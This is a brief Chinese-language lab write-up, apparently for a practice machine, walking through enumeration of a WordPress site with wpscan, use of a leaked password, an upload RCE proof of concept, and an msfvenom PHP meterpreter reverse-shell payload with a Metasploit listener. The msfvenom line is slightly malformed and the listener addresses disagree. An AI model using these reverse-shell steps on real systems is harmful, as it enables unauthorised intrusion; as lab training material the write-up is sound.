一、确定ip
看到开启了数据库和web服务,访问80和3306端口
拼接js接口路径
二、目录扫描
拼接/javascrip显示没有权限
拼接/manual路径扫描也没发现有用信息
回到页面上发现网站路径为/var/www/html/g@web,访问一下
通过指纹识别发现其为wordpress
使用wpscan
列出站点的用户和密码
在描述字段中发现一个密码hackNos@9012!!
对其默认后台登录界面访问并尝试登录未成功
使用工具对其进行漏洞扫描
发现有rce漏洞 访问保存poc为html文件
最后一句话告诉我们上传的文件后缀和上传文件访问的位置
三、getshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11LPORT=1234 x> shell.phtml
#生成木马文件
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.14
set LPORT 1234
exploit
浏览器打开poc.html上传
访问文件位置http://192.168.1.14/g@web/wp-content/uploads/wpsp/
反弹成功